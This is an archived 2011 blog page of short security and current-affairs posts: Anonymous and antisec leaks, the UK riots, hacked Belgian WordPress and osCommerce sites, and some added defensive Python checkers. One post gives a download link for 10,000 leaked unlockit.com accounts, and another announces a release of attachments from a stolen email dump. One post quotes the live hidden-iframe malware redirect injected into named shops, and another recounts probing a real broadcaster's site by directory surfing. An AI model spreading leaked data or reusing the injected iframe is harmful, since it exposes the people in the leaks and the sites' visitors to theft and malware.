security - Page 137

  • san Francisco railway system and Anonymous : how a local incident becomes internetglobal

    the incident : two armed cops from the railway system in san francisco use their guns during an incident and two people are dead

    the eye-catching : the san francisco railway system decides to block cellphones in some stations to prevent protest actions from self-organizing and anticipating the movements and reactions from their own police force (democratic control ?)

    the internet backlash : Anonymous accepts that this is a cause worthy of some reaction - even if it is only to show that you don't mess like that with the 'right to communicate' - and calls for online and offline actions

    the eye-catching : the san francisco railway system decides to close down certain stations for fear of the protests and decides to go publicly against the protestors

    the internet backlash : the website got hacked and a database of 2000 persons (workers and contacts) got published and the online reputation is tarnished

    the protests themselves got more press than protestors wearing the Anonymous masks but that is a success an sich

    it is a perfect example how overreaction leads to a global protest that leads to overreaction that leads to a problem that is completely out of control public-relationwise and is an IT-fiasco

    or how an idea that "has been read somewhere" can lead to such results if it ain't researched, prepared and analyzed with a very critical point of view instead of just rushing into it

    sometimes the online world seems like a village and a village can become the center of an important part of the global world

  • #ukriots - what is the impact of the #watercannon

    according to the Belgian minister of Interior a watercannon is worth 100 policemen - this means that if you use a watercannon you need 100 fewer policemen at that particular place. If you take into account that at most places the number of attackers was between 20 and 200 and that the police needed a one-on-one presence, then you can see why watercannons would have made a significant difference

    secondly in Belgium we use them also to 'hold' positions combined with a kind of barbed wire - these positions hardly get broken through (with very few police present at that position)

    there are permanently 2 watercannons at standby at 2 different locations in Brussels - ready to intervene at notice (like the firebrigade)

    we also use a horsebrigade - of which there are also some on permanent standby in Brussels

    it also seems the UK has no specialised separate riotbrigade like the rest of Europe has, which may explain the lack of training, material and riot-control-strategy

    riot control is a specific kind of crowdcontrol and you really have to be trained for it and have the necessary material and strategy, which is why in Europe the policeforces have separate units who deal with the frontline battle when riots occur

    take that into consideration for the Olympics

    not someone from LA who lives in an environment with national guard, guns and gangs

    and before looking at what the french are saying, look at what the permanent crime and burnt-car statistics say weekend after weekend for their hot-spots (on which they have given up in fact)

    ps also look at where the riots took place and where the Olympic infrastructure is :)

  • teampoison and Anonymous working together ?

    Anonymous is a movement that consists of different clusters and groups that sometimes work together, sometimes battle against others, sometimes exists or dissolves or launch campaigns together or only

    when lulzsec started his antisec campaign - that from sabu seems now to have been taken over by various other small teams who publish daily or weekly a selection of dumps of databases or just the links where to send your sql-injector-database-extractor 

    another thing that makes it even more difficult to follow the flow of incoming datadumps and alert the cert that something is wrong (or maybe wrong) is that pastebin.com, the main anonymous site where you can copy paste anything you want, is now more and more controlling and deleting database dumps and hackguides for certain sites (pastebin ID unknown is mentioned)

    but back to the story

    when Lulzsec became a part of Anonymous, after saying first that they were a bit bored with all these political discussions and old-guard vs newcomers back-and-forth exchanges, teampoison and a few other hackers declared war on them and said they were going to expose them and hack their sites and all that kind of stuff. It is unclear yet if their information has led the police to the arrests and it is unclear yet if the lulzsec operation has been broken beyond repair - but for the moment we are seeing a lot less headline grabbing stuff from lulzsec. But you shouldn't underestimate them. They are sitting on gigabytes of stuff that isn't released yet - unless all copies have been found by the police.

    teampoison made itself not really popular in the Anonymous community with this action and the exchanges online and the anti-teampoison actions and dox were not really friendly

    but Anonymous always surprises us and when analyzers think that the movement can be predicted and analyzed along the lines of organizational science and analytics they will make many mistakes if they persist

    I more and more see it as a flashmob - something that comes together at a certain moment for a while to do certain things that may or may not be planned and of which the beginning is planned but all the rest depends on the actions of every active actor in the campaign and that after a while goes slowly or quickly away and turns its attention to other goals and movements and tactics

    you can't say they have a strategy - they have tactics - and you can't say they have an ideology - they have some kind of vague 'be all one against the injustice of it all and we all come together with specific demands or just revenge for the injustice done' - and in that they resemble revolutions and riots when they start (these don't have leaders in the beginning, it is only later in the movement that leaders and strategies appear)

    the disadvantage is that they can't hold on long to a tactic that needs a prolonged time of action to be successful - take the antipaypal action. They were successful the first week but now the action seems to be winding down and attention has gone to other actions. This means that firms and organisations that come under attack from the Anonymous movement have to mobilize all necessary resources instantly to be able to limit the damage. As it becomes clear that such a campaign will only go on for a few days or a few weeks max, the budgetary impact of throwing all these resources into the defense of the networks and the continuity of the online resources isn't that enormous. It also makes room for a new market in which a consortium of services (business continuity, deep defense, customer control, logging, crisis communication,...) can step in instantly and take over the command and control of a network and the online resources to protect it and keep it going while the Anonymous campaign is launching or in full swing. We can't demand from all the online business to re-invest the millions necessary to make their online presence totally immune to such a flash mob attacking all possible inroads in a network or ways to disturb the functioning of the service. But you can expect that they will activate stand-by contracts when they come under attack.

    now back to the flash-action-mob

    well this is maybe another proof that anonymous is in fact a flash mob. Because for teampoison and Anonymous to come together for a global action against the music companies (Anonymous birth is in the actions from 4chan against the music companies and the firms that prosecute the P2P users) it means that all is forgotten

    and that is like in riots and revolutions, you are sometimes enemies and sometimes comrades and sometimes it just depends on the fact if you find a common enemy or not

    for Anonymous there are enough common enemies around to regroup its different factions even if they were battling each other online for life and death

    however one should note that the dumping of all that accountdata of innocent users is not supported by everyone in the Anonymous community

    but you can't predict what it means, you can't predict Anonymous, you can only follow and try to follow it wisely and try to see the facts through the hype and sensation and try to give practical advice to those who are or will be under attack

  • the russian fastflux botnets are back again

    this is what the analysis from arbor networks shows

    in the domainnames of the botnetcontrollers you see two important things

    * they have an .ru domainextension (or .com)

    * they have mostly a pharmaceutical name in the domainname

    blocking .ru is something quite cheap if you can afford it

    or you can whitelist it for specific people if only a few send mails or visit websites with an .ru domain

  • 10.000 accounts leaked from hacked unlockit.com

    you can download it from here

    http://www.filesonic.com/file/1654677301

    it has been sent to the cert.be

    there are belgian addresses in it

    if you have no .be emailaddress then you may check it for yourself

    this is the biggest unlocking service for mobiles and smartphones

    it also means that everyone on that list has a vulnerable phone, because they can't install the latest security updates as these would re-lock their phones

    this means that some of these phones are vulnerable to the latest attacks

    and a few have even used their professional emailaddresses, so it will be even easier to find their mobiles

    (who said that publishing your mobile number is without risks ?)

    and so on, you will get the picture, there are also emailaddresses from banks and corporations

  • what emailsecurity professionals could learn from the us sheriffs emailhack

    some weeks ago lulzsec declared it was dumping 7 giga of emails and files from a mailserver from an organisation that organised services for sheriffs in the Usa

    A big chunk of that was a download from the mailserver

    after analyzing this I kept thinking about the new demands these attacks pose for emailsecurityprofessionals

    1. Not every online mailbox is worth something

    You will see that many online mailboxes have been emptied and have no interest whatsoever. some mailboxes have folders that seem empty and only trash and non-confidential stuff that stayed online.

    What it means is that for future online mailboxes, if you don't want mail to stay on the personal computers, it still has to leave the mailserver and go to another server that can only be accessed from the inside or through a secure channel like a VPN (and not the server itself).

    It also means that one should have a big discussion about the question whether you need an emaildestroypolicy instead of a conservationpolicy. If you say that all that has not been saved on internal secure servers will be destroyed, then you will always have a cleaner webmailbox.

    A side thought is about the attachments which are sometimes confidential internal (personnel) files. It should be possible to keep only the mails online and have the attachments on another server (which would need another authentication)

    2. Not all mailboxes are clean

    We have seen mailboxes with viruses (yes there are virusalerts for this dump) and personal stuff and some questionable stuff that seems to be private. It means that if you have a mailserver your securitypolicy should be implemented across the board and not only for some specific mailboxes.

    3. No passwords or encryption on files

    and so you could read nearly everything and open nearly every file

    putting the file in a zipfile with a password isn't too hard to ask

    and for the securityresearchers

    we will be releasing this weekend a release of the dump that has only the attachments and pics and some other stuff

    by this release it is clear that when a mailbox gets hacked so many things can get stolen that a securityprofessional doesn't know where to start

    * personnel files

    * accounts and forms

    * pics of badges and icons

    * personal files or about other persons

    for a phisher this is a goldmine
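An added example, not part of the original post: one way to audit a webmail store against points 1 and 3 above, reporting mail that has outlived a destroy window and attachments that are not password-protected ZIP archives. The 30-day window, the function names and the sample mailbox (addresses, subjects, file names) are assumptions constructed for the illustration.

```python
import io
import zipfile
from datetime import datetime, timedelta, timezone
from email import message_from_bytes, policy
from email.message import EmailMessage
from email.utils import format_datetime, parsedate_to_datetime

MAX_AGE = timedelta(days=30)  # assumed destroy-policy window, not from the post


def zip_requires_password(data):
    """True if data is a ZIP archive whose every member has the encryption flag set.

    Bit 0 of the general-purpose flags only says that a password is needed;
    it says nothing about the strength of the cipher or of the password.
    """
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            members = archive.infolist()
    except zipfile.BadZipFile:
        return False  # not a ZIP at all: readable by whoever copies the mailbox
    return bool(members) and all(m.flag_bits & 0x1 for m in members)


def audit_message(raw, now):
    """Check one stored message against the destroy window and the attachment rule."""
    msg = message_from_bytes(raw, policy=policy.default)
    sent = parsedate_to_datetime(str(msg["Date"]))
    unprotected = [
        part.get_filename() or "(unnamed)"
        for part in msg.iter_attachments()
        if not zip_requires_password(part.get_payload(decode=True) or b"")
    ]
    return {
        "subject": str(msg["Subject"]),
        "expired": now - sent > MAX_AGE,
        "unprotected": unprotected,
    }


def audit_mailbox(raw_messages, now):
    """Return only the messages that break one of the two rules."""
    reports = [audit_message(raw, now) for raw in raw_messages]
    return [r for r in reports if r["expired"] or r["unprotected"]]


def build_message(subject, sent, attachments=()):
    """Constructed sample mail; addresses and file names are made up."""
    msg = EmailMessage()
    msg["From"] = "clerk@example.org"
    msg["To"] = "office@example.org"
    msg["Subject"] = subject
    msg["Date"] = format_datetime(sent)
    msg.set_content("see attachment")
    for name, data in attachments:
        msg.add_attachment(data, maintype="application",
                           subtype="octet-stream", filename=name)
    return msg.as_bytes()


def plain_zip(member, content):
    """Build a ZIP archive without a password (constructed sample data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr(member, content)
    return buf.getvalue()


NOW = datetime(2011, 8, 15, tzinfo=timezone.utc)
SAMPLE_MAILBOX = [
    build_message("roster", NOW - timedelta(days=90),
                  [("personnel.zip", plain_zip("staff.csv", "name,badge\n"))]),
    build_message("lunch", NOW - timedelta(days=2)),
    build_message("badge photo", NOW - timedelta(days=5),
                  [("badge.jpg", b"\xff\xd8 constructed bytes")]),
]

if __name__ == "__main__":
    for report in audit_mailbox(SAMPLE_MAILBOX, NOW):
        print(report)
```

Office documents are ZIP containers too, so an unencrypted .docx or .xlsx is reported the same way as a plain archive.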

  • ukriots : you are convicted and your conviction is tweeted for all to see

    so the police have arrested more than a thousand people - some say 1200 for the whole of the UK - and even if there are no riots like we have seen on tv the first days of the week every night a number of people get arrested (my tweetlist about the ukriots has all the official twitterfeeds from the uk policeforces where riots are/were happening - so they mention all the different arrests and incidents). The incidents are relatively minor  and maybe the number of arrests is normal - but now the question is how to pull this state of police presence and calm over the weekend (always a dangerous moment).

    like in the Usa the uk has now organized 24-hour courts where magistrates, based on the evidence before them, hand out convictions to those charged (yes you read it right, the courts are sitting 24h a day for the moment and people work in shifts).

    the courts have even accepted that the convictions are being sent in real-time on the web by twitter

    you can follow this process here (not sure if there are other ones)

    https://twitter.com/#!/AdamMcCleanITV

    https://twitter.com/#!/robsmithitv

    you should combine this with the fact that certain police forces tweet the name and charge of everyone they charge with a criminal act (sometimes it may be just insults and foul behavior other times it is robbing and rioting and violence)

    https://twitter.com/#!/list/mailforlen/ukriots

  • only drastic measures brought the UK back to 'normal'

    the news wasn't good during the day as the UK prepared yesterday for another crucial night

    the racist English Defence League has called upon its supporters to man the streets and defend the neighborhoods. As some of them have shown little consideration for the law and a love for violence first, discussions afterwards, this may lead to problems.

    some streets or communities are manning their own vigilantes - but how long can you keep up 20h working days (because you still have to work during the day while you are up in the street until very late) - as mixed as the rioters are - as mixed are the communities defending their properties against the looters

    yesterday - this night three people died when defending property or being on the street guarding it - it is luckily enough also that some are 'immigrants' making it difficult to make a stereotype EDL would love

    in some cities the football matches are going ahead even if they are considering local curfews around shopping areas (and the others)

    according to a yougov opinion poll the people want more police with batons and plastic bullets and tear gas and the works and would even support military in a supportive role but they believe that most of the rioters won't be convicted and they blame the government and the mayor (oh yes and I don't think the police forces on the mainland would be willing to lend their watercannons now, being unsure of what would happen between now and monday depending on the UK situation)

    the best joke seen

    http://photoshoplooter.tumblr.com/

    but aside from this best joke ever seen the last days, you can ask yourself how long you can live in this normality. Roads to the city centers over the UK were closed between the afternoon and midnight, public transport was cancelled or diverted, shops closed at 16h and people went and stayed mostly home in certain otherwise lively city centers while thousands of police were massing on the street, arresting anyone who even looked like ready to stir any trouble, it was like an unofficial curfew (if you don't want to make or get in trouble, stay home, the fact that you are on the street, makes you suspicious)

    the most important is that the circle - the dynamic - of violence has been broken and that if that situation can be maintained until after the weekend they can maybe go back to some kind of normality even if some things in some neighborhoods will never be the same for years to come

    this promises for the Olympics

  • from burning London to the UK

    While the police have been massing to London, the cities that have sent their best police troops to the capital - and stopped it from burning - have given the possibility to gangs of estate youth (kind of innercities of doom and gloom with generational poor) the room and possibility to attack, loot and move around several cities.

    so the police won London but has lost a lot of other cities and killed the idea that it was only a major problem of London (which is 11 million people by the way). There were also 3 people killed this night while standing guard before their house or shop (and being run over by a car and things like that)

    and it may be that in the coming week - and probably in the weekend - problems may also arise in cities on the continent (in fact this is what the police forces and media on the continent are preparing for)

    the army has units on standby because it is clear that the UK police can hold London but there aren't enough police around to hold the UK once everywhere the estate kids decide in groups between 20 and 100 to attack the stores they don't have money for (after been bombarded daily with youth advertising that they need those things to be someone)

    it is not clear what the PM will decide next. He doesn't have many options with the weekend before him. He can't get police out of London, he can't send more police to London and he can't get the watercannons out of Northern Ireland either (except if they interrupt for the time being the marching season).

    France declared local states of emergency when a wave of innercity violence spread over France like wildfire and police was overstretched. They didn't call in the army but the police and the mayors had the possibility to decide for local curfews, give the police wide powers to arrest or apprehend and interdict weapons and masks and things like that. If you don't read about riots in the innercities of France it is not because the level of violence in these innercities or estates has disappeared, it is only not on the political and media agenda anymore. Every night there are numerous cars going up in flames in those cities and an enormous list of incidents and crime and except from the televised big police operations the state (and the commercial investors) have mostly retreated from these areas (no postal office, no decent school, no late public transport and so on).

  • 10 practical riot and disaster tips for small UK business and shops

    this is what I have said to family in the UK having some small business

    1. Take all the important documents out of the office and in a safe place that won't be looted or burnt (or a copy or scan it but you will have other things to do) and Migrate all your important electronic files on all your electronic stuff (computer, phone, laptop) to central servers hosted somewhere else

    2. Practical and Physical safety and security is enormously important. If you thought of changing locks on the door and getting thicker glass or things to protect your windows (or your shop) you do it now. If you don't have that money or time, then you will have to empty your shop-store of everything very valuable (limit payments in cash, prefer creditcards (give a reduction if they do)). Apple emptied its own store before closing down. It went in vans to a safe area. For shops like Apple you can re-organize your business so that you don't have much stock anymore and the sold article is sent by a deliveryservice to the client the same day from that safe location. I believe strongly in click-and-mortar (and this is one reason why)

    3. Everyone should have phone numbers from everyone and everyone should always be accounted for and everyone should know who to call when something happens. The person responsible for the security should have the phone numbers of local police and emergency services. If your business is great or important, you should have a very short talk or email with the local police to inform them who to contact if their intelligence tells them there will be trouble or a curfew will be installed in your area. If you have a few pounds, you buy a second phone which is only used during these emergencies. This phone should only be used for these purposes so keep it open (battery is important) and accessible (short conversations) in emergencies. Minutes can be very important during riots. Do not buy a blackberry as second emergency phone as they may have to interrupt service during riots. Also have a contract with another major mobile provider than the one you use for the other phone.

    4. Organize an evacuation exercise but be sure that you know exactly how many minutes it will take to have everybody safe, not out of the building but out of the trouble area. It is information that the police officer will know when he 'has to hold the street' but knows that they will have 'to retreat'. If you say 'I need 10 minutes to get everybody out and in their cars and the cars in a column to drive away' he will probably try to hold on another 10 minutes, if you have no idea, he won't have any either.

    5. If you leave by car - several cars form a column - you must remember that you may never stop (and keep all doors closed) whatever the circumstances. Do not stop (except if you are going to kill someone on the ground, but then you go backwards or aside, or if your car is really on fire). Do not stop because windows are crashing or people are asking you to or sitting or jumping ON it. Have in the column claxon signals for (forwards, backwards, left, right, help)

    6. Never do all these things alone and stay together until you are out of the trouble area

    7. Always stay calm and alert and continue with leaving the area - bystanders are always hindering police operations

    8. Inform parents, partners and family that you are all right and going to a safe place

    9. Make arrangements for the next day with staff depending on the situation

    10. If you have been looted or the office is burnt out, you will have to look for another office and eventually computers and re-organize the work a bit (but you have your documents and your electronic files out of harm's way). There are systems where you can work online from your homes (vpn - shared offices online or sometimes even email and google documents may be enough, eventually coupled with a blog and twitter to keep people informed of things) - do not start setting up a website, you won't have time.

    This way you can phone or mail your clients and ask for a week to re-start if necessary and say that you were prepared and that everything goes as planned. This will make a lasting impression.

    You can defend your shop or house, ok, but last night 3 people were killed by doing that. Was it worth it ? It is better to defend a street or neighborhood but that you have to coordinate with the police (and not use it as an excuse to start drinking and having trouble among yourselves)

  • updated news about the uk ongoing riots (manchester and birmingham)

    * blackberry may interrupt service tonight in London

    * you can follow the latest controlled news on twitter

    twitter.com/mailforlen

    or the list with other good sources (being updated)

    https://twitter.com/#!/mailforlen/ukriots

    I have added police tweets and official media - also from manchester and birmingham

    official media is making less reports and less live reporting

    yesterday it was like - come on out the police is overwhelmed see for yourself

    today reports of arrests and police operations during the day

    more news articles and online resources are here

    http://www.diigo.com/list/mailforlen/international

    the one thing I have been twittering about is the following : watercannons

    here is the summary

    The UK has 6 watercannons in total (yes six) while they are being used very often and effectively on mainland Europe and .... in Northern Ireland where those 6 watercannons are (but have to stay because it is the marching season). The police wanted to use them anyhow but the Home secretary was against it because it is 'uncivilised' (which means that the people on the mainland and in Northern Ireland are barbarians ?).

    You wouldn't see 20 policemen running away from 50 rioters if they were supported by a watercannon

    So I would say, support the British, send your watercannons

    for the techies

    oh yes blackberry is a better organizer of illegal acts than twitter because it is encrypted and messages are only for the people who are your friends (and that is not the police for rioters) but blackberry may consider stopping the service tonight and will cooperate with the police

    and twitter is exploding in the uk now

    the police services are also using it (how do yours)

  • london : the night the police must win

    After three nights of freerunning rioting and seeing videos of overwhelmed and selfprotective police without the mechanical and operational means to intervene - making people call for the army

    this is the night that the policeforces have to prove to the londoners and the world (as Olympic city) that they can control this

    of course this will have an enormous impact on the necessary investments in security and crowd control for the Olympics at a time when the UK was preparing itself to let thousands of police officers go - and having much too few of them in case of many disparate disturbances

    tonight the police must win if they don't want the army on the street in certain cities

    it is clear however - coming from belgium - that the police doesn't have the same means they have in Northern Ireland because that would be too 'uncivilized' like watercannons or other specialized cars (like you see on tv when they are rioting again in Northern Ireland)

    If you don't want to invest in the manpower to control crowds you will have to invest more in intelligence and 'mechanics' and tactics to compensate.

    If you have been in London you know how poor some areas are (and the poorest we didn't visit)

    twitter.com/mailforlen

  • new antisec hackteam building (daring and without fear)

    https://twitter.com/#!/TehWongZ

    when you follow the twitter and the groups over a period of time, you see things happening before your eyes

    first he came with a few vulnerability analysis of some big sites like bbc and so on

    now he has a team with other antisec twitters who are joining

    he doesn't always dump the data, sometimes he just exposes the big securityholes

    (and sometimes you think don't those very big sites do those controls regularly or automatically (it isn't even expensive :))

    I think - up till the moment he is arrested or gets frightened - he will do some stuff - horrific for some and fantastic for others

    but up until now he is really enjoying this stuff and the attention

    which will mean he is not ready to stop yet

    it is as if he knows he can be arrested and that if that is so, then let that be the case, but why not have some fun in between

  • belgian oscommerce websites still infected with even more redirectpages

    we are talking about oscommerce sites who are selling stuff online and sometimes using creditcards, your paypal accounts or other personal details (sometimes many times just in http by the way)

    since the alert was launched about an injection attack on oscommerce (open source shoppingsoftware) you could hope that the administrators would take at least notice and fix the stuff. This is not about blogs and pix and vids, but about money and money makes the world go around (especially today)

    on the contrary the attacks (in which visitors to these sites are redirected to malware and other sites) have more than doubled, and that with one particular injected redirection script

    "http://willysy.com/images/banners/" site:be

    or it is that the script is infecting an increasing number of pages on the website (for example because they are added)

    we are now at nearly 26.000 pages at the following sites

      22. SynTsize pump - Fitstar

        www.fitstar.be/product_info.php?products_id=161
        This site may harm your computer.
        23 okt 2010 – Fitstar<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe> ...
      23. Sun-power.be<iframe src='http://willysy.com/images/banners/' style ..

        www.sun-power.be/webshop/ - Cached
        X-press 120W/2m. 11.99. X-press 100W. 8.60. X-tend 0.3-25watt. 6.99. Website | Uw klantgegevens | Winkelwagen | Afrekenen | Copyright © 2011 Sun-power.be ..
      24. Tazmas,Armani watches,Watches Jewellery Specialist,Guess ...

        Armani watches, Armani Jewellery, Armani Jewelry ,ring,Armani rings, Armani bracelet, Armani necklace, Emporio Armani, ,Fossil Watches, Burberry Watches ...
      25. CRE Loaded 6 - CRE Loaded Store<iframe src='http://willysy.com ...

        osCommerce : What's New Here? - Hardware Software DVD Movies What's New Here? - Hardware Software DVD Movies.
      26. ABAO

        www.abaobxl.be/catalog/index.php - Cached
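The search results above all show the same hidden iframe glued onto the shop name, so it even ends up in the page title. A shop owner can check their own pages for that pattern with a few lines; this is an added example, not part of the original post. The host names `shop.example` and `video.example.net`, the sample page and the function names are constructed for the illustration; the iframe string is the one visible in the results.

```python
import re
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""")
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
TITLE_RE = re.compile(r"<title\b[^>]*>(.*?)</title>", re.I | re.S)

def _attrs(tag_body):
    """Parse attributes of one tag; handles single, double and unquoted values."""
    return {m.group(1).lower(): m.group(2) or m.group(3) or m.group(4) or ""
            for m in ATTR_RE.finditer(tag_body)}

def _same_site(host, site_host):
    site = site_host.lower()
    if site.startswith("www."):
        site = site[4:]
    return host == site or host.endswith("." + site)

def find_injected_iframes(html, site_host):
    """Report off-site iframes that are hidden or sit inside <title>.

    A visible off-site embed (video player) or a hidden same-site frame is
    not reported: the combination is what marks the injection.
    """
    title_spans = [m.span(1) for m in TITLE_RE.finditer(html)]
    findings = []
    for m in IFRAME_RE.finditer(html):
        a = _attrs(m.group(1))
        src_host = (urlparse(a.get("src", "")).hostname or "").lower()
        if not src_host or _same_site(src_host, site_host):
            continue
        reasons = []
        if any(start <= m.start() < end for start, end in title_spans):
            reasons.append("inside-title")
        if HIDDEN_RE.search(a.get("style", "")) or "0" in (a.get("width"), a.get("height")):
            reasons.append("hidden")
        if reasons:
            findings.append({"src_host": src_host, "reasons": reasons})
    return findings

# Constructed sample page for a shop at www.shop.example
SAMPLE_PAGE = """<html><head>
<title>Example Shop<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe></title>
</head><body>
<iframe src="https://video.example.net/embed/42" width="560" height="315"></iframe>
<iframe src="/cart/keepalive.php" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    print(find_injected_iframes(SAMPLE_PAGE, "www.shop.example"))
```

The scan works on the raw HTML on purpose: an HTML parser may treat the content of `<title>` as plain text and never see the tag.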


  • canvas the cleanup operation and the importance of directory surfing

    so it was cleaned by 16:57

    then the page-updater flickered and showed this

    [screenshot: Index of /wp-content/themes/canvasvideo2]

    it is small but you see a series of files - which is an index of files or a directory

    directory surfing is the third most popular attack nowadays

    called the cert

    a few minutes later it was corrected

    I only saw white pages

    but didn't I say that directory surfing was the third most popular attack nowadays

    so I will start by eliminating slashes/directories from here

    http://video.canvas.be/wp-content/themes/canvasvideo2/index.php

    until I arrive at this

    http://video.canvas.be/wp-content/

    an administrator login page with only one password and ...... no https certificate

    all clear text

    this is why directory surfing is so popular

    you are always amazed by what you find :)
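On the server side this kind of walk up the directory tree is easy to spot in the access log, and the status codes show which directories answered. The check below is an added example, not part of the original post; the log lines, the client addresses and the function names are constructed, only the path is the one from the post. It is a heuristic: a visitor clicking through a deep menu can trigger it too.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" or "common" log format, GET and HEAD only
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) (\S+) [^"]*" (\d{3}) ')

def ancestors(path):
    """'/a/b/c.php' -> ['/a/b/', '/a/', '/']"""
    out, cur = [], path.rstrip("/")
    while cur:
        cur = cur.rsplit("/", 1)[0]
        out.append(cur + "/")
    return out

def find_directory_walks(lines, min_levels=2):
    """Return {client: {directory: status}} for clients that requested at
    least `min_levels` bare parent directories of something they fetched
    earlier. The site root is ignored, everybody requests it."""
    seen = defaultdict(set)     # client -> parent dirs of all paths so far
    walked = defaultdict(dict)  # client -> {directory: first status seen}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, status = m.group(1), int(m.group(3))
        path = m.group(2).split("?", 1)[0]
        if path.endswith("/") and path != "/" and path in seen[client]:
            walked[client].setdefault(path, status)
        seen[client].update(ancestors(path))
    return {c: d for c, d in walked.items() if len(d) >= min_levels}

# Constructed sample log
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Aug/2011:17:02:11 +0200] "GET /wp-content/themes/canvasvideo2/index.php HTTP/1.1" 200 5120',
    '198.51.100.20 - - [08/Aug/2011:17:02:15 +0200] "GET /video/clip.php?id=3 HTTP/1.1" 200 9000',
    '203.0.113.7 - - [08/Aug/2011:17:02:19 +0200] "GET /wp-content/themes/canvasvideo2/ HTTP/1.1" 200 812',
    '203.0.113.7 - - [08/Aug/2011:17:02:24 +0200] "GET /wp-content/themes/ HTTP/1.1" 403 199',
    '198.51.100.20 - - [08/Aug/2011:17:02:30 +0200] "GET / HTTP/1.1" 200 15000',
    '203.0.113.7 - - [08/Aug/2011:17:02:31 +0200] "GET /wp-content/ HTTP/1.1" 200 1430',
]

if __name__ == "__main__":
    for client, dirs in find_directory_walks(SAMPLE_LOG).items():
        print(client, dirs)
```

Every directory that shows up with status 200 in the result is one to open yourself: it either serves an index listing or a page that was never meant to be reached that way.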

  • Joop.nl hacked twice in two days and lost twice 6000 accounts

    sometimes you don't believe what you read

    we have been talking about sql injection for years

    it is in all the programmers books

    and then an important dutch site from a dutch television station got hacked twice in a few days

    and loses its 6000 accounts on the internet

    and has to send them all a letter

    they have upgraded the encryption and closed the sql injection holes

    and they are lucky the accounts weren't already published online yet (probably dutch hackers or cybercrime)

    the reason why is that I think that this blog-discussionboard is very controversial and people discuss politics and society in very harsh and disrespectful terms (nearly hateful)

    so it is not luck that is responsible for the attacks, but the way you conduct the discussions on your site

    if you want to sit in the heat of the kitchen you should be knowledgeable enough not to get burnt

  • studio 100 private data hacked and leaked : you may be next

    studio100 is one of the biggest media companies around in Belgium at the moment and it had on its website all the personal information of a whole lot of celebrities (who may now change address and so on because all these fans will be phoning them ......)

    the hack was the work of a dutch hacker Pompiedompiedom but that doesn't seem to be a very well-known underground name as far as I can see

    he showed it to webwereld.nl because he was afraid that the company would go after him - which would be easy based on the existing cybercrime law in Belgium (and why you shouldn't do that in Belgium as a Belgian - until now all important hacks by Belgians against Belgian sites resulted in arrests, indictments and sometimes a trial that can take years before it begins)

    it was a stupid sql injection that gave access to several databases with information that probably didn't have to be on that webserver (never heard of a VPN and an extranet and double authentication ?)

    even more astonishing is the reaction of the spokesperson : we will do some research and if something needs to be done, we will do it.

    huh, if someone with a simple sql injection can show a journalist all the private addresses of artists, journalists and politicians a company works with, then you have to do something, and immediately (take the databases offline for starters)

    the penetrationtest failed big time on your account

    lesson : in these times you keep as little private information as needed outside your network and you host whatever is production server or private information on your intranet (defended by a VPN, encryption and double authentication ideally).

  • canvas and abelag.be had their wordpress hacked

    http://video.canvas.be/wp-content/themes/canvasvideo2/index.php

    http://www.abelag.be/wp-content/themes/PrestigeDarkVol1/index.php

    and they didn't see it happening nor that it was there

    wordpress zero day from last week

    gives you the possibility to insert anything (porn, viruses, webshells etc....)

    [screenshot: iskorpitx_1312807574348.png]

    monitoring is for dummies

  • belgian cert about the antisec campaign in Belgium (3500 victims)

    we have been forwarding information to the cert about leaked belgian addresses, accounts and sites

    the belgian cert now says the following

    around 3500 belgian accounts or accounts from belgians were published the last months

    they note that only 100 persons reacted and that most didn't understand or even didn't appreciate what they did

    http://datanews.rnews.be

    luckily we work for the greater good and can make an abstract about that

    it also means that without regulations and controls you can't work efficiently

     


  • netanalyzr : block it from your networks

    the reasons are in the posts under it

    the links to the servers are all put in here

    http://www.scribd.com/doc/61674312/netalyzr-icsi-berkeley-edu-1

    after some discussions on their mailinglist after mailing them

    * they still think that it is about links to the reports in private forums and not all the reports that are on their own server

    * they don't understand how dangerous that information can be and why networks may not like that information being on the internet

    * a lot of discussion and remarks that are no real answers

    * only a very small change, being the robots.txt

     

    so does that inspire trust

    If I was a network or a security tool I would block them for now

    and no, I don't have time for apple or linux is better type discussions